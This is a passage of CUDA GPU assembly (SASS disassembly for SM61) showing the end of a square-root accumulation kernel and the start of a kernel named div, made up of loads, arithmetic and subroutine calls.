/*03d0*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*03d8*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/* 0x001ff400fda107f6 */
/*03e8*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*03f0*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*03f8*/ @!P1 BRA 0x418 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*0408*/ CAL 0xd78 ; /* 0xe260000096800040 */
/*0410*/ SYNC ; /* 0xf0f800000007000f */
/*0418*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*0428*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0430*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0438*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*0448*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0450*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0458*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*0468*/ { IADD32I R4, R3, 0x5 ; /* 0x1c00000000570304 */
/*0470*/ SSY 0x530 }
/* 0xe29000000b800000 */
/*0478*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*0488*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0490*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0498*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*04a8*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*04b0*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*04b8*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*04c8*/ @!P1 BRA 0x4e0 ; /* 0xe24000000109000f */
/*04d0*/ CAL 0xd78 ; /* 0xe26000008a000040 */
/*04d8*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*04e8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*04f0*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*04f8*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*0508*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0510*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0518*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*0528*/ SYNC }
/* 0xf0f800000007000f */
/*0530*/ { IADD32I R4, R3, 0x6 ; /* 0x1c00000000670304 */
/*0538*/ SSY 0x5f8 }
/* 0xe29000000b800000 */
/* 0x001f8800fcc207f1 */
/*0548*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0550*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0558*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*0568*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0570*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0578*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*0588*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0590*/ @!P1 BRA 0x5b0 ; /* 0xe24000000189000f */
/*0598*/ CAL 0xd78 ; /* 0xe26000007d800040 */
/* 0x003fc400e3a007fd */
/*05a8*/ SYNC ; /* 0xf0f800000007000f */
/*05b0*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*05b8*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/* 0x001fd840fec007f5 */
/*05c8*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*05d0*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*05d8*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/* 0x001fc000ffa007f0 */
/*05e8*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*05f0*/ SYNC }
/* 0xf0f800000007000f */
/*05f8*/ { IADD32I R4, R3, 0x7 ; /* 0x1c00000000770304 */
/* 0x001f9840fe2007f6 */
/*0608*/ SSY 0x6c0 }
/* 0xe29000000b000000 */
/*0610*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0618*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001f9000f62007e2 */
/*0628*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0630*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0638*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/* 0x001ff400fda107f6 */
/*0648*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0650*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0658*/ @!P1 BRA 0x678 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*0668*/ CAL 0xd78 ; /* 0xe260000070800040 */
/*0670*/ SYNC ; /* 0xf0f800000007000f */
/*0678*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*0688*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0690*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0698*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*06a8*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*06b0*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*06b8*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*06c8*/ { IADD32I R4, R3, 0x8 ; /* 0x1c00000000870304 */
/*06d0*/ SSY 0x790 }
/* 0xe29000000b800000 */
/*06d8*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*06e8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*06f0*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*06f8*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*0708*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0710*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0718*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*0728*/ @!P1 BRA 0x740 ; /* 0xe24000000109000f */
/*0730*/ CAL 0xd78 ; /* 0xe260000064000040 */
/*0738*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*0748*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0750*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0758*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*0768*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0770*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0778*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*0788*/ SYNC }
/* 0xf0f800000007000f */
/*0790*/ { IADD32I R4, R3, 0x9 ; /* 0x1c00000000970304 */
/*0798*/ SSY 0x858 }
/* 0xe29000000b800000 */
/* 0x001f8800fcc207f1 */
/*07a8*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*07b0*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*07b8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*07c8*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*07d0*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*07d8*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*07e8*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*07f0*/ @!P1 BRA 0x810 ; /* 0xe24000000189000f */
/*07f8*/ CAL 0xd78 ; /* 0xe260000057800040 */
/* 0x003fc400e3a007fd */
/*0808*/ SYNC ; /* 0xf0f800000007000f */
/*0810*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0818*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/* 0x001fd840fec007f5 */
/*0828*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0830*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0838*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/* 0x001fc000ffa007f0 */
/*0848*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0850*/ SYNC }
/* 0xf0f800000007000f */
/*0858*/ { IADD32I R4, R3, 0xa ; /* 0x1c00000000a70304 */
/* 0x001f9840fe2007f6 */
/*0868*/ SSY 0x920 }
/* 0xe29000000b000000 */
/*0870*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0878*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001f9000f62007e2 */
/*0888*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0890*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0898*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/* 0x001ff400fda107f6 */
/*08a8*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*08b0*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*08b8*/ @!P1 BRA 0x8d8 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*08c8*/ CAL 0xd78 ; /* 0xe26000004a800040 */
/*08d0*/ SYNC ; /* 0xf0f800000007000f */
/*08d8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*08e8*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*08f0*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*08f8*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*0908*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0910*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0918*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*0928*/ { IADD32I R4, R3, 0xb ; /* 0x1c00000000b70304 */
/*0930*/ SSY 0x9f0 }
/* 0xe29000000b800000 */
/*0938*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*0948*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0950*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0958*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*0968*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0970*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0978*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*0988*/ @!P1 BRA 0x9a0 ; /* 0xe24000000109000f */
/*0990*/ CAL 0xd78 ; /* 0xe26000003e000040 */
/*0998*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*09a8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*09b0*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*09b8*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*09c8*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*09d0*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*09d8*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*09e8*/ SYNC }
/* 0xf0f800000007000f */
/*09f0*/ { IADD32I R4, R3, 0xc ; /* 0x1c00000000c70304 */
/*09f8*/ SSY 0xab8 }
/* 0xe29000000b800000 */
/* 0x001f8800fcc207f1 */
/*0a08*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0a10*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0a18*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*0a28*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0a30*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0a38*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*0a48*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0a50*/ @!P1 BRA 0xa70 ; /* 0xe24000000189000f */
/*0a58*/ CAL 0xd78 ; /* 0xe260000031800040 */
/* 0x003fc400e3a007fd */
/*0a68*/ SYNC ; /* 0xf0f800000007000f */
/*0a70*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0a78*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/* 0x001fd840fec007f5 */
/*0a88*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0a90*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0a98*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/* 0x001fc000ffa007f0 */
/*0aa8*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0ab0*/ SYNC }
/* 0xf0f800000007000f */
/*0ab8*/ { IADD32I R4, R3, 0xd ; /* 0x1c00000000d70304 */
/* 0x001f9840fe2007f6 */
/*0ac8*/ SSY 0xb80 }
/* 0xe29000000b000000 */
/*0ad0*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0ad8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001f9000f62007e2 */
/*0ae8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0af0*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0af8*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/* 0x001ff400fda107f6 */
/*0b08*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0b10*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0b18*/ @!P1 BRA 0xb38 ; /* 0xe24000000189000f */
/* 0x001c7400ffa007fd */
/*0b28*/ CAL 0xd78 ; /* 0xe260000024800040 */
/*0b30*/ SYNC ; /* 0xf0f800000007000f */
/*0b38*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*0b48*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0b50*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0b58*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/* 0x001ff400fe0007f6 */
/*0b68*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0b70*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/*0b78*/ SYNC }
/* 0xf0f800000007000f */
/* 0x081fc400fec007f0 */
/*0b88*/ { IADD32I R4, R3, 0xe ; /* 0x1c00000000e70304 */
/*0b90*/ SSY 0xc50 }
/* 0xe29000000b800000 */
/*0b98*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/* 0x001ec400fc4007e6 */
/*0ba8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0bb0*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*0bb8*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/* 0x001fb420fec007e4 */
/*0bc8*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0bd0*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/*0bd8*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/* 0x001ff400ffa007fd */
/*0be8*/ @!P1 BRA 0xc00 ; /* 0xe24000000109000f */
/*0bf0*/ CAL 0xd78 ; /* 0xe260000018000040 */
/*0bf8*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001fd401fe20071d */
/*0c08*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/*0c10*/ FMUL.FTZ R6, R10, R4 ; /* 0x5c68100000470a06 */
/*0c18*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/* 0x001fc000fec207f6 */
/*0c28*/ FADD.FTZ R5, -R6.reuse, -RZ ; /* 0x5c5930000ff70605 */
/*0c30*/ FFMA R5, R6, R5, R10 ; /* 0x5980050000570605 */
/*0c38*/ { FFMA R6, R5, R4, R6 ; /* 0x5980030000470506 */
/* 0x001fd800fe0007fd */
/*0c48*/ SYNC }
/* 0xf0f800000007000f */
/*0c50*/ { IADD32I R4, R3, 0xf ; /* 0x1c00000000f70304 */
/*0c58*/ SSY 0xd20 }
/* 0xe29000000c000000 */
/* 0x001f8800fcc207f1 */
/*0c68*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*0c70*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/*0c78*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/* 0x041fd800fc8007b1 */
/*0c88*/ LDG.E R10, [R4] ; /* 0xeed420000007040a */
/*0c90*/ FADD R11, R11, R6 ; /* 0x5c58000000670b0b */
/*0c98*/ IADD32I R7, R10, -0xd000000 ; /* 0x1c0f300000070a07 */
/* 0x001ff400ffa007ed */
/*0ca8*/ ISETP.GT.U32.AND P1, PT, R7, c[0x2][0x0], PT ; /* 0x4b6803880007070f */
/*0cb0*/ @!P1 BRA 0xcd8 ; /* 0xe24000000209000f */
/*0cb8*/ CAL 0xd78 ; /* 0xe26000000b800040 */
/* 0x001c7400ffa007f0 */
/*0cc8*/ { MOV R4, R6 ; /* 0x5c98078000670004 */
/*0cd0*/ SYNC }
/* 0xf0f800000007000f */
/*0cd8*/ MUFU.RSQ R4, R10 ; /* 0x5080000000570a04 */
/* 0x081fd800fea00ff1 */
/*0ce8*/ FMUL.FTZ R5, R10, R4 ; /* 0x5c68100000470a05 */
/*0cf0*/ FMUL.FTZ R4, R4, 0.5 ; /* 0x3868103f00070404 */
/*0cf8*/ FADD.FTZ R6, -R5.reuse, -RZ ; /* 0x5c5930000ff70506 */
/* 0x001ff400fe0007f6 */
/*0d08*/ FFMA R6, R5, R6, R10 ; /* 0x5980050000670506 */
/*0d10*/ { FFMA R4, R6, R4, R5 ; /* 0x5980028000470604 */
/*0d18*/ SYNC }
/* 0xf0f800000007000f */
/* 0x001ff400fe0007f1 */
/*0d28*/ FADD R4, R11, R4 ; /* 0x5c58000000470b04 */
/*0d30*/ { IADD32I R3, R3, 0x10 ; /* 0x1c00000001070303 */
/*0d38*/ @P0 BRA 0x60 }
/* 0xe2400fff3200000f */
/* 0x001f8800fcc207f1 */
/*0d48*/ SHR R3, R0.reuse, 0x1e ; /* 0x3829000001e70003 */
/*0d50*/ ISCADD R2.CC, R0, c[0x0][0x150], 0x2 ; /* 0x4c18810005470002 */
/*0d58*/ IADD.X R3, R3, c[0x0][0x154] ; /* 0x4c10080005570303 */
/* 0x001fb400ffe007f5 */
/*0d68*/ STG.E [R2], R4 ; /* 0xeedc200000070204 */
/*0d70*/ EXIT ; /* 0xe30000000007000f */
/*0d78*/ LOP.AND.NZ P1, RZ, R10, c[0x2][0x4] ; /* 0x4c41300800170aff */
/* 0x001fb400ffa007f0 */
/*0d88*/ { @!P1 MOV R5, R10 ; /* 0x5c98078000a90005 */
/*0d90*/ @!P1 BRA 0xe40 }
/* 0xe24000000a89000f */
/*0d98*/ FSETP.GEU.FTZ.AND P1, PT, R10, RZ, PT ; /* 0x5bbe83800ff70a0f */
/* 0x001fb400ffa007f0 */
/*0da8*/ { @!P1 MOV32I R5, 0x7fffffff ; /* 0x0107fffffff9f005 */
/*0db0*/ @!P1 BRA 0xe40 }
/* 0xe24000000889000f */
/*0db8*/ FSETP.GTU.FTZ.AND P1, PT, |R10|, +INF , PT ; /* 0x36bc83ff80070a8f */
/* 0x001fb400ffa007f0 */
/*0dc8*/ { @P1 FADD.FTZ R5, R10, 1 ; /* 0x3858103f80010a05 */
/*0dd0*/ @P1 BRA 0xe40 }
/* 0xe24000000681000f */
/*0dd8*/ FSETP.NEU.FTZ.AND P1, PT, |R10|, +INF , PT ; /* 0x36bd83ff80070a8f */
/* 0x001c5000fe0007f2 */
/*0de8*/ @P1 FFMA R6, R10, 1.84467440737095516160e+19, RZ ; /* 0x32807fdf80010a06 */
/*0df0*/ { @!P1 MOV R5, R10 ; /* 0x5c98078000a90005 */
/*0df8*/ @P1 MUFU.RSQ R5, R6 }
/* 0x5080000000510605 */
/* 0x081fd800fea00ff1 */
/*0e08*/ @P1 FMUL.FTZ R7, R6, R5 ; /* 0x5c68100000510607 */
/*0e10*/ @P1 FMUL.FTZ R9, R5, 0.5 ; /* 0x3868103f00010509 */
/*0e18*/ @P1 FADD.FTZ R8, -R7.reuse, -RZ ; /* 0x5c5930000ff10708 */
/* 0x001fd800fec007e6 */
/*0e28*/ @P1 FFMA R8, R7, R8, R6 ; /* 0x5980030000810708 */
/*0e30*/ @P1 FFMA R8, R8, R9, R7 ; /* 0x5980038000910808 */
/*0e38*/ @P1 FMUL.FTZ R5, R8, 2.3283064365386962891e-10 ; /* 0x3868102f80010805 */
/* 0x001ffc00ffe007f0 */
/*0e48*/ { MOV R6, R5 ; /* 0x5c98078000570006 */
/*0e50*/ RET }
/* 0xe32000000007000f */
/*0e58*/ BRA 0xe58 ; /* 0xe2400fffff87000f */
/* 0x001f8000fc0007e0 */
/*0e68*/ NOP; /* 0x50b0000000070f00 */
/*0e70*/ NOP; /* 0x50b0000000070f00 */
/*0e78*/ NOP; /* 0x50b0000000070f00 */
...............................
Function : _Z3divPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R6, RZ ; /* 0x5c9807800ff70006 */
/*0018*/ S2R R3, SR_CTAID.X }
/* 0xf0c8000002570003 */
/* 0x085fd841fe20073f */
/*0028*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/*0030*/ XMAD.MRG R2, R3.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270302 */
/*0038*/ XMAD R0, R3.reuse, c[0x0] [0x8], R0 ; /* 0x4e00000000270300 */
/* 0x001f9800fea007f1 */
/*0048*/ XMAD.PSL.CBCC R3, R3.H1, R2.H1, R0 ; /* 0x5b30001800270303 */
/*0050*/ MOV32I R2, 0xffffff00 ; /* 0x010ffffff007f002 */
/*0058*/ MOV R0, R3 ; /* 0x5c98078000370000 */
/* 0x001f9800fca207f1 */
/*0068*/ SHL R8, R0.reuse, 0x2 ; /* 0x3848000000270008 */
/*0070*/ SHR.U32 R7, R0, 0x1e ; /* 0x3828000001e70007 */
/*0078*/ IADD R4.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270804 */
/* 0x0002d800fe0007e2 */
/*0088*/ IADD.X R5, R7, c[0x0][0x14c] ; /* 0x4c10080005370705 */
/*0090*/ { IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*0098*/ LDG.E R5, [R4] }
/* 0xeed4200000070405 */
/* 0x001fd800162007e2 */
/*00a8*/ IADD.X R9, R7, c[0x0][0x144] ; /* 0x4c10080005170709 */
/*00b0*/ LDG.E R12, [R8] ; /* 0xeed420000007080c */
/*00b8*/ IADD32I R2, R2, 0x10 ; /* 0x1c00000001070202 */
/* 0x001fd821ffa007ed */
/*00c8*/ ISETP.NE.AND P1, PT, R2, RZ, PT ; /* 0x5b6b03800ff7020f */
/*00d0*/ CAL 0x810 ; /* 0xe260000073800040 */
/*00d8*/ IADD32I R5, R0, 0x1 ; /* 0x1c00000000170005 */
/* 0x081fd800fea207f1 */
/*00e8*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*00f0*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*00f8*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
/*0108*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*0110*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0118*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/* 0x0002d800fe0000b2 */
/*0128*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0130*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*0138*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/* 0x081fc400fec10ffd */
/*0148*/ CAL 0x810 ; /* 0xe26000006c000040 */
/*0150*/ IADD32I R5, R0, 0x2 ; /* 0x1c00000000270005 */
/*0158*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/* 0x001fc440fec007f5 */
/*0168*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0170*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*0178*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/* 0x0002c800fe0007e6 */
/*0188*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/*0190*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0198*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/* 0x043ff40016c007f0 */
/*01a8*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/*01b0*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*01b8*/ CAL 0x810 ; /* 0xe260000065000040 */
/* 0x001fd440fe2007f6 */
/*01c8*/ IADD32I R5, R0, 0x3 ; /* 0x1c00000000370005 */
/*01d0*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*01d8*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/* 0x001f9800fe2207f6 */
/*01e8*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/*01f0*/ IADD.X R9, R5, c[0x0][0x14c] ; /* 0x4c10080005370509 */
/*01f8*/ IADD R10.CC, R10, c[0x0][0x140] ; /* 0x4c10800005070a0a */
/* 0x001fc000164007f0 */
/*0208*/ { IADD.X R11, R5, c[0x0][0x144] ; /* 0x4c1008000517050b */
/*0210*/ LDG.E R5, [R8] }
/* 0xeed4200000070805 */
/*0218*/ { FADD R6, R6, R4 ; /* 0x5c58000000470606 */
/* 0x001fd821ffa000b6 */
/*0228*/ LDG.E R12, [R10] }
/* 0xeed4200000070a0c */
/*0230*/ CAL 0x810 ; /* 0xe26000005d800040 */
/*0238*/ IADD32I R5, R0, 0x4 ; /* 0x1c00000000470005 */
/* 0x081fd800fea207f1 */
/*0248*/ SHL R10, R5.reuse, 0x2 ; /* 0x384800000027050a */
/*0250*/ SHR.U32 R5, R5, 0x1e ; /* 0x3828000001e70505 */
/*0258*/ IADD R8.CC, R10.reuse, c[0x0][0x148] ; /* 0x4c10800005270a08 */
/* 0x001fc000fcc007f1 */
